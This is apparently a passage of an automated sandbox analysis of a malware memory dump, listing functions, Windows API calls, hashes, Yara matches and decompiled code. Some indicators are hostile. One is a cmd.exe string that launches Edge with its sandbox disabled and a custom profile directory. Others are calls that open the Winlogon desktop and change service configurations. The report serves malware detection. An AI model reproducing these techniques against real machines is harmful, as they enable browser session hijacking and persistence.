                                                                                    • API ID: lstrcat$Createlstrcpy$AddressBlockDirectoryEnvironmentLibraryLoadProcUserlstrcmpwsprintf$CloseDestroyErrorFileFindFirstHandleLastProcessProfile
                                                                                    • String ID: %s%s$\AppData\Local\Microsoft\Edge\User Data$cmd.exe /c start msedge.exe --no-sandbox --allow-no-sandbox-job --disable-3d-apis --disable-gpu --disable-d3d11 --user-data-dir="%
                                                                                    • API String ID: 354288507-1065409233
                                                                                    • Opcode ID: c660c6595d35d0daf0f30e24f232eeacd905e4315f80b0b9e5b50990c72cb19a
                                                                                    • Instruction ID: 7cdf41a5a7efcab69d858ed09e33523349b2150361945f1d4520703d71db4a27
                                                                                    • Opcode Fuzzy Hash: c660c6595d35d0daf0f30e24f232eeacd905e4315f80b0b9e5b50990c72cb19a
                                                                                    • Instruction Fuzzy Hash: 8A2196B1D4010E97CB24EF60DD449DEF3B8FF54304F4051E6A90993040EB30AA99CFA5
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04EDE281, Relevance: 10.6, APIs: 7, Instructions: 60COMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 95%
                                                                                    			E04EDE281(void* __ecx) {
				void* _t4;
				void* _t11;
				void* _t16;
				long _t25;
				void* _t28;

				if( *0x4f03010 != 0xffffffff) {
					_t25 = GetLastError();
					_t11 = E04EDE57E(__eflags,  *0x4f03010);
					__eflags = _t11 - 0xffffffff;
					if(_t11 == 0xffffffff) {
						L5:
						_t11 = 0;
					} else {
						__eflags = _t11;
						if(__eflags == 0) {
							_t4 = E04EDE5B8(__eflags,  *0x4f03010, 0xffffffff);
							_pop(_t16);
							__eflags = _t4;
							if(_t4 != 0) {
								_t28 = E04EE81E1(_t16, 1, 0x28);
								__eflags = _t28;
								if(__eflags == 0) {
									L8:
									_t11 = 0;
									E04EDE5B8(__eflags,  *0x4f03010, 0);
								} else {
									__eflags = E04EDE5B8(__eflags,  *0x4f03010, _t28);
									if(__eflags != 0) {
										_t11 = _t28;
										_t28 = 0;
										__eflags = 0;
									} else {
										goto L8;
									}
								}
								E04EE8159(_t28);
							} else {
								goto L5;
							}
						}
					}
					SetLastError(_t25);
					return _t11;
				} else {
					return 0;
				}
			}








                                                                                    0x04ede288
                                                                                    0x04ede29b
                                                                                    0x04ede2a2
                                                                                    0x04ede2a5
                                                                                    0x04ede2a8
                                                                                    0x04ede2c1
                                                                                    0x04ede2c1
                                                                                    0x04ede2aa
                                                                                    0x04ede2aa
                                                                                    0x04ede2ac
                                                                                    0x04ede2b6
                                                                                    0x04ede2bc
                                                                                    0x04ede2bd
                                                                                    0x04ede2bf
                                                                                    0x04ede2cf
                                                                                    0x04ede2d3
                                                                                    0x04ede2d5
                                                                                    0x04ede2e9
                                                                                    0x04ede2e9
                                                                                    0x04ede2f2
                                                                                    0x04ede2d7
                                                                                    0x04ede2e5
                                                                                    0x04ede2e7
                                                                                    0x04ede2fb
                                                                                    0x04ede2fd
                                                                                    0x04ede2fd
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04ede2e7
                                                                                    0x04ede300
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04ede2bf
                                                                                    0x04ede2ac
                                                                                    0x04ede308
                                                                                    0x04ede312
                                                                                    0x04ede28a
                                                                                    0x04ede28c
                                                                                    0x04ede28c

                                                                                    APIs
                                                                                    • GetLastError.KERNEL32(00000001,?,04EDD7F5,04ED586D,04ED5D10,?,04ED5F20,?,00000001,?,?,00000001,?,04F00550,0000000C,04ED6009), ref: 04EDE28F
                                                                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 04EDE29D
                                                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 04EDE2B6
                                                                                    • SetLastError.KERNEL32(00000000,04ED5F20,?,00000001,?,?,00000001,?,04F00550,0000000C,04ED6009,?,00000001,?), ref: 04EDE308
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ErrorLastValue___vcrt_
                                                                                    • String ID:
                                                                                    • API String ID: 3852720340-0
                                                                                    • Opcode ID: 203332361834ad6a8ea92f1d6d31ebb282cbe9f912445d1e7e405549d5555881
                                                                                    • Instruction ID: 716372123871d67365a2de15927c54e9048540f04908678025f795cbbe256368
                                                                                    • Opcode Fuzzy Hash: 203332361834ad6a8ea92f1d6d31ebb282cbe9f912445d1e7e405549d5555881
                                                                                    • Instruction Fuzzy Hash: 2701D83260AA155EB7242FBDBC8D7763A48FB4167DB20232AF9245D1D0FE16AC826150
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04EC0BA0, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 54libraryloaderCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • LoadLibraryA.KERNEL32(Advapi32.dll), ref: 04EC0BB1
                                                                                    • GetProcAddress.KERNEL32(00000000,RegRenameKey), ref: 04EC0BC7
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AddressLibraryLoadProc
                                                                                    • String ID: Advapi32.dll$RegRenameKey
                                                                                    • API String ID: 2574300362-2310806928
                                                                                    • Opcode ID: 65c8db4022fbe9da9a3d90e1dd8c6c1a90e2c169b4247d49cc3002afe4f60e97
                                                                                    • Instruction ID: 72e47da04a23d46ecde74c61eabb1f6dfe2b69d146d1fd6ae21210ac917f21f2
                                                                                    • Opcode Fuzzy Hash: 65c8db4022fbe9da9a3d90e1dd8c6c1a90e2c169b4247d49cc3002afe4f60e97
                                                                                    • Instruction Fuzzy Hash: CB01DB32B4121CBB8F119FA6BD05CAEBF7DEF85667B104195FD0DD2100D6329E119690
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04EC38B0, Relevance: 10.6, APIs: 7, Instructions: 53serviceCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,04EC3B78), ref: 04EC38C2
                                                                                    • OpenServiceW.ADVAPI32(00000000,?,000F01FF,?,?,?,?,?,04EC3B78), ref: 04EC38D5
                                                                                    • LockServiceDatabase.ADVAPI32(00000000), ref: 04EC38E2
                                                                                    • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000003,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,000F01FF), ref: 04EC38FD
                                                                                    • UnlockServiceDatabase.ADVAPI32(?), ref: 04EC3908
                                                                                    • CloseServiceHandle.ADVAPI32(00000000,?,000F01FF,?,?,?,?,?,04EC3B78), ref: 04EC390F
                                                                                    • CloseServiceHandle.ADVAPI32(00000000,?,000F01FF,?,?,?,?,?,04EC3B78), ref: 04EC3916
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Service$CloseDatabaseHandleOpen$ChangeConfigLockManagerUnlock
                                                                                    • String ID:
                                                                                    • API String ID: 2762133943-0
                                                                                    • Opcode ID: 7471350e7aca516aba4ddb14b308baa5288249dc67d1cb8a6e82b50ba85386c0
                                                                                    • Instruction ID: bb194ebbbe50e0ff88758d1c450d9667184650171fe907760085ead084536661
                                                                                    • Opcode Fuzzy Hash: 7471350e7aca516aba4ddb14b308baa5288249dc67d1cb8a6e82b50ba85386c0
                                                                                    • Instruction Fuzzy Hash: FCF06831702655B7971117A79D4CD6BFA7CDBC57A3710021AFE15E2289DE78CD018570
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04EC3830, Relevance: 10.6, APIs: 7, Instructions: 53serviceCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,04EC3B6F), ref: 04EC3842
                                                                                    • OpenServiceW.ADVAPI32(00000000,?,000F01FF,?,?,?,?,?,04EC3B6F), ref: 04EC3855
                                                                                    • LockServiceDatabase.ADVAPI32(00000000), ref: 04EC3862
                                                                                    • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000002,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,000F01FF), ref: 04EC387D
                                                                                    • UnlockServiceDatabase.ADVAPI32(?), ref: 04EC3888
                                                                                    • CloseServiceHandle.ADVAPI32(00000000,?,000F01FF,?,?,?,?,?,04EC3B6F), ref: 04EC388F
                                                                                    • CloseServiceHandle.ADVAPI32(00000000,?,000F01FF,?,?,?,?,?,04EC3B6F), ref: 04EC3896
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Service$CloseDatabaseHandleOpen$ChangeConfigLockManagerUnlock
                                                                                    • String ID:
                                                                                    • API String ID: 2762133943-0
                                                                                    • Opcode ID: 830190eac3b9d9cedebc14edb8a3467991dc0dfb75089ffffac205c5e2dc13a2
                                                                                    • Instruction ID: 6bf22b4c5b087bd25904da386790248a53e86a99ba03be87b4ddecb4e3837a27
                                                                                    • Opcode Fuzzy Hash: 830190eac3b9d9cedebc14edb8a3467991dc0dfb75089ffffac205c5e2dc13a2
                                                                                    • Instruction Fuzzy Hash: 5EF0AF32302355BB871127A7AD4CC6BBA7CDBC67A2700026AFE15D2285DE68DC018670
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04ED1990, Relevance: 10.6, APIs: 7, Instructions: 51COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SetLastError.KERNEL32(0000139F), ref: 04ED19A1
                                                                                    • TryEnterCriticalSection.KERNEL32(?,?), ref: 04ED19B3
                                                                                    • SetLastError.KERNEL32(0000139F), ref: 04ED19C8
                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 04ED19CF
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CriticalErrorLastSection$EnterLeave
                                                                                    • String ID:
                                                                                    • API String ID: 2124651672-0
                                                                                    • Opcode ID: 0d199e17b2a179efd50ef7b8a92e84c4d2c11bd45da45c5bc57c5e1711f6ccb2
                                                                                    • Instruction ID: 6aa2679c8f6f3591e861be0fc865a60f6670cc54c9cc351dc3878edf7ec0fcd1
                                                                                    • Opcode Fuzzy Hash: 0d199e17b2a179efd50ef7b8a92e84c4d2c11bd45da45c5bc57c5e1711f6ccb2
                                                                                    • Instruction Fuzzy Hash: 1A012532300210DBD320A7AAE4489AAF7E9DBD5726F00452BF916D5544CA75F842D665
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04EC56A0, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 37threadwindowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 04EC56A2
                                                                                    • GetThreadDesktop.USER32(00000000,?,?,04EC1D6B), ref: 04EC56A9
                                                                                    • OpenDesktopA.USER32(Winlogon,00000000,00000000,400001CF), ref: 04EC56BF
                                                                                      • Part of subcall function 04EC5620: GetCurrentThreadId.KERNEL32 ref: 04EC5637
                                                                                      • Part of subcall function 04EC5620: GetThreadDesktop.USER32(00000000,?,00000000), ref: 04EC563E
                                                                                      • Part of subcall function 04EC5620: GetUserObjectInformationW.USER32(00000000,00000002,?,00000100,?,?,00000000), ref: 04EC565C
                                                                                    • CloseDesktop.USER32(00000000,?,?,04EC1D6B), ref: 04EC56D7
                                                                                    • PostMessageW.USER32(0000FFFF,00000312,00000000,002E0003), ref: 04EC56F3
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: DesktopThread$Current$CloseInformationMessageObjectOpenPostUser
                                                                                    • String ID: Winlogon
                                                                                    • API String ID: 3882203166-744610081
                                                                                    • Opcode ID: d3ea80579c875cee19bd6b3291298af2efcbe551bb28309a345fc1f56c612443
                                                                                    • Instruction ID: e41e319bd4dae840ca9ca63444a892f2977798f1058021d15d240788d68d10c2
                                                                                    • Opcode Fuzzy Hash: d3ea80579c875cee19bd6b3291298af2efcbe551bb28309a345fc1f56c612443
                                                                                    • Instruction Fuzzy Hash: 6CF0273234022037E7222775BD09FEE2615CFC0B62F140828F901DB1C4DB98BC830354
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04EEC168, Relevance: 9.2, APIs: 6, Instructions: 216COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,04EE7BE8,04EE7BE8,?,?,?,04EEC3B9,00000001,00000001,44E85006), ref: 04EEC1C2
                                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,04EEC3B9,00000001,00000001,44E85006,?,?,?), ref: 04EEC248
                                                                                    • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,44E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 04EEC342
                                                                                    • __freea.LIBCMT ref: 04EEC34F
                                                                                      • Part of subcall function 04EE8193: HeapAlloc.KERNEL32(00000000,00000001,00000004,?,04EE91A3,00000001,00000000,?,04EE13EE,00000001,00000004,00000000,00000001,?,?,04EE0FAC), ref: 04EE81C5
                                                                                    • __freea.LIBCMT ref: 04EEC358
                                                                                    • __freea.LIBCMT ref: 04EEC37D
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ByteCharMultiWide__freea$AllocHeap
                                                                                    • String ID:
                                                                                    • API String ID: 3147120248-0
                                                                                    • Opcode ID: a29da7de400e30c02d97c019e5bb70b29b57b1868a3ec50c67f939c7b2aaa391
                                                                                    • Instruction ID: 6469b8f44a412f1cf3d53fc2ac112d2217d0846c8668d0943db8f8abfcd29aa8
                                                                                    • Opcode Fuzzy Hash: a29da7de400e30c02d97c019e5bb70b29b57b1868a3ec50c67f939c7b2aaa391
                                                                                    • Instruction Fuzzy Hash: 1351EF72610606AFEB258F66CC41EBF77AAEB44758F285669FD18D7140EB34FC40C6A0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04ED32C0, Relevance: 9.2, APIs: 6, Instructions: 151memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • InterlockedDecrement.KERNEL32(?), ref: 04ED32F7
                                                                                    • HeapFree.KERNEL32(?,00000000,?,?,?,00000000,?,04ED31A8,?,?,?,?,00000000), ref: 04ED3320
                                                                                      • Part of subcall function 04ED2560: EnterCriticalSection.KERNEL32(00000054,?,?,00000000,00000000), ref: 04ED2599
                                                                                      • Part of subcall function 04ED2560: EnterCriticalSection.KERNEL32(-0000006C), ref: 04ED259F
                                                                                    • HeapFree.KERNEL32(?,00000000,?,?,00000000,00000001,00000000,00000000,?,?,00000000,?,04ED31A8,?,?,?), ref: 04ED3368
                                                                                    • InterlockedExchangeAdd.KERNEL32(00000040,?), ref: 04ED33C1
                                                                                      • Part of subcall function 04ED1D90: SetLastError.KERNEL32(00000000,?,00000000,?,?,?,04ED3414,00000000,?,?,04ED31A8,?,?,?,?,00000000), ref: 04ED1DAD
                                                                                      • Part of subcall function 04ED1D90: InterlockedDecrement.KERNEL32(00000028), ref: 04ED1E26
                                                                                      • Part of subcall function 04ED1D90: HeapFree.KERNEL32(?,00000000,00000000,00000000,?,04ED3414,00000000,?,?,04ED31A8,?,?,?,?,00000000), ref: 04ED1E47
                                                                                    • InterlockedExchangeAdd.KERNEL32(00000044,?), ref: 04ED33DF
                                                                                    • InterlockedExchangeAdd.KERNEL32(00000044,?), ref: 04ED3405
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Interlocked$ExchangeFreeHeap$CriticalDecrementEnterSection$ErrorLast
                                                                                    • String ID:
                                                                                    • API String ID: 1561599947-0
                                                                                    • Opcode ID: 7c04b7a7002e83428e6fc251b4b8c0f7bbd96f095f3e3ec00580e382e35fa37a
                                                                                    • Instruction ID: a6029d4d0aa3c3e67b40dcdd9eb04e8306cf816557b6ea198d139610bd82204e
                                                                                    • Opcode Fuzzy Hash: 7c04b7a7002e83428e6fc251b4b8c0f7bbd96f095f3e3ec00580e382e35fa37a
                                                                                    • Instruction Fuzzy Hash: 1841B037600214ABDB249FA9ED48EAB776CFF85329B00522AFA06D7550CA35F816C761
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04ED52F0, Relevance: 9.1, APIs: 6, Instructions: 146networkmemoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • WSARecv.WS2_32(?,-0000001B,00000001,00000001,?,00000000,00000000), ref: 04ED5361
                                                                                    • WSAGetLastError.WS2_32(?,?,?,?,?,00000001,00000000,?,?,?,04ED25F2), ref: 04ED536C
                                                                                    • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,00000001,00000000,?,?,?,04ED25F2), ref: 04ED539C
                                                                                    • SetLastError.KERNEL32(00000000,?,?,?,?,?,00000001,00000000,?,?,?,04ED25F2), ref: 04ED53AA
                                                                                    • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,00000001,00000000,?,?,?,04ED25F2), ref: 04ED53C9
                                                                                    • HeapFree.KERNEL32(?,00000000,00000001,00000001,?,?,?,?,?,?,?,?,00000001,00000000,?,?), ref: 04ED5454
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CriticalErrorLastSection$EnterFreeHeapLeaveRecv
                                                                                    • String ID:
                                                                                    • API String ID: 4219686125-0
                                                                                    • Opcode ID: e2391f210a2c78e99d603cb0f70cde38ef5c2eb897830e587902dae32f0a4ec3
                                                                                    • Instruction ID: dffad95e7b4836b8cd337c5c2b15b5b8099806e2b19058e6857ec8ac45824618
                                                                                    • Opcode Fuzzy Hash: e2391f210a2c78e99d603cb0f70cde38ef5c2eb897830e587902dae32f0a4ec3
                                                                                    • Instruction Fuzzy Hash: 42518F71A00215EFDB20CF59C884BBEBBB5FF88315F54506AE906AB284D774A942CB61
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04ECEDD0, Relevance: 9.1, APIs: 6, Instructions: 137threadnetworkCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 04ECEDEC
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 04ECEDF0
                                                                                    • WSAWaitForMultipleEvents.WS2_32(00000004,?,00000000,000000FF,00000000,?,00000000), ref: 04ECEE7C
                                                                                    • WSAGetLastError.WS2_32(?,00000000), ref: 04ECEECE
                                                                                      • Part of subcall function 04ECF250: EnterCriticalSection.KERNEL32(?), ref: 04ECF284
                                                                                      • Part of subcall function 04ECF250: LeaveCriticalSection.KERNEL32(?), ref: 04ECF2DB
                                                                                      • Part of subcall function 04ECF250: HeapFree.KERNEL32(00000000,00000000,?,?,?,00000000), ref: 04ECF31F
                                                                                      • Part of subcall function 04ECF250: EnterCriticalSection.KERNEL32(?,?,00000000), ref: 04ECF331
                                                                                      • Part of subcall function 04ECF250: LeaveCriticalSection.KERNEL32(?), ref: 04ECF370
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 04ECEEFD
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 04ECEF20
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CriticalCurrentSectionThread$EnterLeave$ErrorEventsFreeHeapLastMultipleWait
                                                                                    • String ID:
                                                                                    • API String ID: 2095029031-0
                                                                                    • Opcode ID: 6ed40efc4aaa2e23427393e75e9d4996101c43a425fff063b874da5e3031c48e
                                                                                    • Instruction ID: 4de04792165892e599d122b7b5b4072d98d69073375b380a71389d303846a4cb
                                                                                    • Opcode Fuzzy Hash: 6ed40efc4aaa2e23427393e75e9d4996101c43a425fff063b874da5e3031c48e
                                                                                    • Instruction Fuzzy Hash: C6413670600614DFEB24DF28CA84BAEB7E4EF48358F101A1DE946D7280DB75F906CB95
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04ED43F0, Relevance: 9.1, APIs: 6, Instructions: 106COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • getsockopt.WS2_32(?,0000FFFF,00001001,?,00000000), ref: 04ED4426
                                                                                    • InterlockedCompareExchange.KERNEL32(00000000,00000000,00000001), ref: 04ED446C
                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 04ED447F
                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 04ED448B
                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 04ED44C1
                                                                                    • PostQueuedCompletionStatus.KERNEL32(?,000000F3,00000001,00000000), ref: 04ED44E2
                                                                                      • Part of subcall function 04ED4680: InterlockedExchangeAdd.KERNEL32(?,00004E20), ref: 04ED470B
                                                                                      • Part of subcall function 04ED4680: WSASend.WS2_32(?,00004E20,00000001,?,00000000,?,00000000), ref: 04ED473E
                                                                                      • Part of subcall function 04ED4680: WSAGetLastError.WS2_32 ref: 04ED4749
                                                                                      • Part of subcall function 04ED4680: InterlockedDecrement.KERNEL32(00000002), ref: 04ED4759
                                                                                      • Part of subcall function 04ED4680: HeapFree.KERNEL32(?,00000000,?,?), ref: 04ED4789
                                                                                      • Part of subcall function 04ED2560: EnterCriticalSection.KERNEL32(00000054,?,?,00000000,00000000), ref: 04ED2599
                                                                                      • Part of subcall function 04ED2560: EnterCriticalSection.KERNEL32(-0000006C), ref: 04ED259F
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CriticalSection$EnterInterlocked$ExchangeLeave$CompareCompletionDecrementErrorFreeHeapLastPostQueuedSendStatusgetsockopt
                                                                                    • String ID:
                                                                                    • API String ID: 2014370420-0
                                                                                    • Opcode ID: d8b4ba2894f4f3c3ec89dc248d1e2c15f60dc8062829c3f11faa772b46c7c59e
                                                                                    • Instruction ID: f95a8c96ea843e54e16f4875025bf44ab80f011c13b0e8973c07dc58a9b43974
                                                                                    • Opcode Fuzzy Hash: d8b4ba2894f4f3c3ec89dc248d1e2c15f60dc8062829c3f11faa772b46c7c59e
                                                                                    • Instruction Fuzzy Hash: BB31E371A00109BFEB25DFA4D884ABEF378FF55319F40512AEA11961C0CBB5B952CF80
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04ED3530, Relevance: 9.1, APIs: 6, Instructions: 92memorytimeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • timeGetTime.WINMM ref: 04ED3545
                                                                                    • EnterCriticalSection.KERNEL32(00000054,?,?,?,?,?,04ED339E,?,00000000,?,?,?,00000000,?,04ED31A8), ref: 04ED3567
                                                                                    • SetLastError.KERNEL32(00000000,?,04ED339E,?,00000000,?,?,?,00000000,?,04ED31A8,?,?,?,?,00000000), ref: 04ED3575
                                                                                    • LeaveCriticalSection.KERNEL32(00000054,?,04ED339E,?,00000000,?,?,?,00000000,?,04ED31A8,?,?,?,?,00000000), ref: 04ED3591
                                                                                    • GetLastError.KERNEL32 ref: 04ED35F5
                                                                                    • HeapFree.KERNEL32(?,00000000,?,?), ref: 04ED362A
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CriticalErrorLastSection$EnterFreeHeapLeaveTimetime
                                                                                    • String ID:
                                                                                    • API String ID: 340097737-0
                                                                                    • Opcode ID: 49463f91752e307be8bb3dafdf27574eae7f7857f208bf52c5036b863e977d4f
                                                                                    • Instruction ID: 8e2589e30da2a6ea40e72453f7c74f13250a2fd840e20f0bf65113f4f3a77a86
                                                                                    • Opcode Fuzzy Hash: 49463f91752e307be8bb3dafdf27574eae7f7857f208bf52c5036b863e977d4f
                                                                                    • Instruction Fuzzy Hash: 88318F75A00205EBDB14DF15C888BAAB7A9FF48315F54502AFD19D7280DB34FD16CBA1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04ECDF00, Relevance: 9.1, APIs: 6, Instructions: 92networkCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • WSAEventSelect.WS2_32(?,?,00000023), ref: 04ECDF18
                                                                                    • WSAGetLastError.WS2_32(?,04ECDE23,00000010), ref: 04ECDF23
                                                                                    • SetLastError.KERNEL32(00000000,?,04ECDE23,00000010), ref: 04ECDF58
                                                                                    • send.WS2_32(?,00000000,00000000,00000000), ref: 04ECDF73
                                                                                    • WSAGetLastError.WS2_32(?,04ECDE23,00000010), ref: 04ECDF7E
                                                                                    • GetLastError.KERNEL32(?,04ECDE23,00000010), ref: 04ECDF99
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$EventSelectsend
                                                                                    • String ID:
                                                                                    • API String ID: 259408233-0
                                                                                    • Opcode ID: 4eb2006be2914f6497329cb673e168aded459a7f2b06b0a7e2e325e891325585
                                                                                    • Instruction ID: ccabe57c3437619c4c1b65cc959ab2d7cecbb9c956be64714e07601ffd1ec605
                                                                                    • Opcode Fuzzy Hash: 4eb2006be2914f6497329cb673e168aded459a7f2b06b0a7e2e325e891325585
                                                                                    • Instruction Fuzzy Hash: 08215E712007409FE7309F65E848B56BBE5FB44319F104A2DE656C66D0C3B6E4548B90
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04EB7AB0, Relevance: 9.1, APIs: 6, Instructions: 86COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • RaiseException.KERNEL32(C000001D,00000001,00000000,00000000,?,04EB83CB,80004005,?,04EB87E8,04EB8B5E,00000000,?), ref: 04EB7ACE
                                                                                    • EnterCriticalSection.KERNEL32(?,00000004,?,?,04EB83CB,80004005,?,04EB87E8,04EB8B5E,00000000,?), ref: 04ECF693
                                                                                    • LeaveCriticalSection.KERNEL32(?,?,?,04EB83CB,80004005,?,04EB87E8,04EB8B5E,00000000,?), ref: 04ECF6BB
                                                                                    • SetLastError.KERNEL32(0000139F,?,04EB83CB,80004005,?,04EB87E8,04EB8B5E,00000000,?), ref: 04ECF6C7
                                                                                      • Part of subcall function 04ECF710: SetEvent.KERNEL32(?,?,?,?,?,04ECF6B1,00000000,00000000,?,?,04EB83CB,80004005,?,04EB87E8,04EB8B5E,00000000), ref: 04ECF76C
                                                                                    • SetLastError.KERNEL32(0000139F,?,?,04EB83CB,80004005,?,04EB87E8,04EB8B5E,00000000,?), ref: 04ECF6DF
                                                                                    • SetLastError.KERNEL32(00000057,74E5F5E0,?,?,04EB83CB,80004005,?,04EB87E8,04EB8B5E,00000000,?), ref: 04ECF6F7
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$CriticalSection$EnterEventExceptionLeaveRaise
                                                                                    • String ID:
                                                                                    • API String ID: 3848672818-0
                                                                                    • Opcode ID: dfe70f22b2a35c70e1c8fc053d3368c4d0d293a002dc81a1411b13d209169f4c
                                                                                    • Instruction ID: f741cb1fc508fa1555a4d80f57bd3a4731466319d2c4703c3e5ad1f3d7aece7e
                                                                                    • Opcode Fuzzy Hash: dfe70f22b2a35c70e1c8fc053d3368c4d0d293a002dc81a1411b13d209169f4c
                                                                                    • Instruction Fuzzy Hash: DA11D632300205ABD7005A25D908BBA7B6AEFC8752F11C42EFD09DB194DF7AE95296A0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04ED3440, Relevance: 9.1, APIs: 6, Instructions: 81memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • setsockopt.WS2_32(?,0000FFFF,00007010,?,00000004), ref: 04ED347C
